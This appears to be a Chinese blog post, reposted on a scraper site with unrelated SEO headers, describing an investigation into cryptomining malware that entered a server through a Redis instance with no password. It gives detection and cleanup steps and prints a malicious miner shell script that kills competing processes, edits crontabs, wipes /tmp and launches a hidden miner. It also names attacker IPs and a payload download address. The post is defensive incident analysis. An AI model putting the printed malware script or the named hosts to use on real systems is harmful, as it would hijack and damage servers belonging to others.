当前位置: 首页 > news >正文

模板建站的网站想开一个外企的网站怎么超做

模板建站的网站,想开一个外企的网站怎么超做,杭州的电商网站建设,画出网站和目录结构图ps#xff1a;因为项目保密的原因部分的截图是自己在本地的环境复现。 1. 起因 客户打电话过来说#xff0c;公司web服务异常卡顿。起初以为是web服务缓存过多导致#xff0c;重启几次无果后觉得可能是受到了攻击。起初以为是ddos攻击#xff0c;然后去查看web服务器管理…ps因为项目保密的原因部分的截图是自己在本地的环境复现。 1. 起因 客户打电话过来说公司web服务异常卡顿。起初以为是web服务缓存过多导致重启几次无果后觉得可能是受到了攻击。起初以为是ddos攻击然后去查看web服务器管理面板时发现网络链接很少但是cpu占用高达99%于是便怀疑是中了挖矿病毒。 2.排查可疑进程 首先发现cpu占用率过高初步怀疑是挖矿病毒。于是上ssh开始排查 使用top命令查看进程占用列表。发现并没有占用过高的程序但是查询cpu占用率确实是99%。怀疑是隐藏了linux进程。 以为是做了进程隐藏于是写了个python脚本遍历/proc目录。/proc目录是一个虚拟文件系统用于提供有关系统内核和运行进程的信息。该目录中包含一系列以数字命名的子目录每个子目录代表一个正在运行的进程。在这些子目录中可以访问有关进程状态、内存使用情况、打开的文件列表等信息。 该脚本遍历proc目录查询ps aux不显示的进程id然后显示打印出来。 import osdef get_max_pid():pid_list [int(pid) for pid in os.listdir(/proc) if pid.isdigit()]return str(max(pid_list))def get_existing_process_ids(max_pid):process_ids []for pid in range(1, int(max_pid) 1):if os.path.exists(/proc/ str(pid)):process_ids.append(str(pid))return process_idsdef get_ps_aux_process_ids():process_ids []output os.popen(ps aux).read()lines output.split(n)for line in lines[1:]:if line.strip() ! :pid line.split()[1]process_ids.append(pid)return process_idsmax_pid get_max_pid() existing_process_ids get_existing_process_ids(max_pid) ps_aux_process_ids get_ps_aux_process_ids()for pid in existing_process_ids:if pid not in ps_aux_process_ids:print(Hidden PID {}.format(pid))emmmm, 但是效果不是很理想有一大部分进程都是僵尸进程。 然后一个一个排查后效果不佳并无发现什么可疑进程。 帮助网安学习全套资料S信免费领取 ① 网安学习成长路径思维导图 ② 60网安经典常用工具包 ③ 100SRC分析报告 ④ 150网安攻防实战技术电子书 ⑤ 最权威CISSP 认证考试指南题库 ⑥ 超1800页CTF实战技巧手册 ⑦ 最新网安大厂面试题合集含答案 ⑧ APP客户端安全检测指南安卓IOS 3 排查网络链接 于是打算从网络链接中入手使用netstat -antp进行排查。发现有进程在链接47.130.146.28这个ip地址然后拿这个ip地址反查域名。 发现是绑定的log.softgoldinformation.com这个域名。 然后搜索这个域名发现之前也有人排查过了。 然后发现其实还有其他ip 这里就不一一截图了。monerooceanxmrigkdevtmpfsimysqlserver等病毒基本上都有在链接。服务器基本上已经中了n种病毒了。基本上与各种矿池都有链接。 然后协商客户运维设置只允许服务器访问国内ip地址这一步主要是为了能通畅的链接ssh。因为挖矿病毒一般都是挖取xmrxmr使用的基本上都是cpu在挖矿进程链接不了矿池的情况下通常都不会产生cpu占用。果然禁止服务器出网后cpu占用率就下来了。也是为了防止服务器继续链接挖矿者的c2 4 寻找漏洞 问过客户服务器有装什么软件然后说是为了方便做web数据库的缓存半个月之前装了redis。 使用ps aux|grep redis查看redis端口。 尝试空密码链接成功。基本确定入口点是redis。 5 补救措施 发现基本已经在跑着几个挖矿的病毒了。这里不确定能不能把后门排查完只能和客户沟通说先排查一遍看看。因为挖矿木马一般都会有后门在清理挖矿程序后后门会自动检查挖矿程序是否运行如果不运行的话会重新下载一个挖矿程序然后再次运行。所以在完全清除挖矿程序后一段时间内cpu占用率不飙升就可以说明清理成功。反之则说明挖矿病毒并未清理成功。 首先查看一下定时任务。 发现并无异常。 cat /etc/crontab 然后查看tmp目录发现有sh文件 这里抽取一个sh来分析基本上/tmp出现这种都可以确定服务器被挖矿了。同理的还有/var/tmp目录。 ls -la /tmp 随便打开一个配置文件就能发现攻击者的矿池地址和钱包地址。这种情况基本把tmp目录全部清除即可。 下面是一个 solr的挖矿病毒脚本这里只是kill掉了挖矿同行的进程和定时任务。 #!/bin/sh export PATH$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin while [ 1 ] dokillall /tmp/*killall /var/tmp/*crontab -l | sed /195.3.146.118/d | crontab -crontab -l | sed /cf.sh/d | crontab -crontab -l | sed /xms/d | crontab -crontab -l | sed /kwork.sh/d | crontab -crontab -l | sed /cyberium/d | crontab -crontab -l | sed /newdat/d | crontab -rm -f /tmp/*ps aux | grep -v grep | grep javaupDates | awk {print $2} | xargs -I % kill -9 %ps aux | grep -v grep | grep givemexyz | awk {print $2} | xargs -I % kill -9 %ps aux | grep -v grep | grep dbused | awk {print $2} | xargs -I % kill -9 %ps aux | grep -v grep | grep kdevtmpfsi | awk {print $2} | xargs -I % kill -9 %ps aux | grep -v grep | grep kinsing | awk {print $2} | xargs -I % kill -9 %ps aux | grep -v grep | grep -v 27.1 | grep -v 222.122 | grep wget | awk {print $2} | xargs -I % kill -9 %ps aux | grep -v grep | grep -v 27.1 | grep -v 222.122 | grep curl | awk {print $2} | xargs -I % kill -9 %ps aux | grep -v grep | grep -v 27.1 | grep -v 222.122 | grep urlopen | awk {print $2} | xargs -I % kill -9 %pgrep JavaUpdate | xargs -I % kill -9 %pgrep kinsing | xargs -I % kill -9 %pgrep donate | xargs -I % kill -9 %pgrep kdevtmpfsi | xargs -I % kill -9 %pgrep trace | xargs -I % kill -9 %pgrep sysupdate | xargs -I % kill -9 %pgrep mysqlserver | xargs -I % kill -9 %ps aux | grep -v grep | grep trace | awk {print $2} | xargs -I % kill -9 %pkill xmrigpkill sysupdatepkill sysguardpkill kthreaddkpkill networkservicepkill kdevtmpfsipkill watchbogp$(ps auxf|grep solrd|awk {if($360.0) print $2})name$pif [ -z $name ]thenpkill solrdps aux | grep -v grep | grep -v java|redis|weblogic|solr|mongod|mysql|oracle|tomcat|grep|postgres|confluence|awk|aux|sh | awk {if($360.0) print $2} | xargs -I % kill -9 %nohup /tmp/.solr/solrd /dev/null sleep 30nohup /tmp/.solr/genshin /dev/null sleep 30else:fi done ​查看/etc/passwd 是否有恶意用户 cat /etc/passwd 查看ssh是否有后门用户 (因为是redis的洞 很有可能会写入sshkey) ls -la /root/.ssh/ 然后用clamscan扫描一遍 clamscan -r / 设置redis密码登录。这一步是由客户人员配置 然后删除tmp目录下的脚本文件 rm -rf /tmp/*.sh 6 脚本分析 这里抽取其中的一个sh脚本讲一下挖矿病毒逻辑因为脚本较大所以这里是抽取部分代码过一遍逻辑实际上常见的挖矿病毒脚本基本都差不多是一个逻辑所以这里抽取了一个。 首先脚本的逻辑是从kill掉其他挖矿同行进程开始 然后写了一个定时任务 然后判断目标系统位数到[http://94.103.87.71/]{.underline}去下载病毒程序 这也就是最终的病毒文件 果不其然 最后是自动清理本身 总结 这次事故主要是因为开发人员不懂安全直接开放redis数据库在公网并且不设置登录密码。虽然是内网服务器但是万幸做好了隔离。不然挖矿病毒肯定会在内网进行传播。 ps听说客户之后去问了开发小哥开发小哥说随便在网上找的教程教程上是这样配置的就直接复制粘贴上去。所以建议大家在配置东西的时候尽量去查一下文档。
http://www.zqtcl.cn/news/948680/

相关文章:

  • 电子商务网站建设新闻深圳坂田网站设计公司有哪些
  • 上海电子商城网站制作wordpress循环该分类子分类
  • 茶山做网站教育网站建设计划书
  • 成品门户网站源码免费海外网络加速器免费
  • 企业网站怎么建设公司深圳企业招聘信息最新招聘信息
  • 天津网站经营性备案下载网站上的表格 怎么做
  • 胶州企业网站设计十大互联网营销公司
  • 视频解析wordpresswordpress 优化版本
  • 柳州网站建设哪家便宜广东省建设厅三库一平台
  • 云南城市建设官方网站wordpress和织梦哪个好
  • 国外企业招聘网站专门做外贸的网站有哪些
  • 陕西交通建设集团网站营销公司是什么意思
  • 网站建设自建与租用区别杭州建设局网站官网
  • 广告公司企业介绍seo研究中心怎么样
  • 苏州网站建设熊掌岳阳做网站哪家好
  • 深圳网站制作公司报价单宝塔做两个网站6
  • 百度站长工具怎么查排名贵港网站制作
  • 运城个人网站建设学校网站建设目的
  • 住房城乡建设部门门户网站购物网站排名大全
  • 手机网站平台江门网站建设模板
  • 做本地网站需要什么资质百度多长时间收录网站
  • 网站建设公司使用图片侵权使用者有无责任夸克免费空间
  • 网站建设制作鸿运通做网站能用python吗
  • 站长源码之家Wordpress 新建标签
  • 太原网站建设详细策划如何建设网站简答题
  • 乡村生态旅游网站建设方案如何做网站的导航栏
  • wordpress百度百科网站开发 seo
  • 网站主机名wordpress主题修改底部版权
  • 网站官网怎么做龙岩iot开发福建小程序建设
  • 哪个学校设有网站开发专业北京有哪些网站公司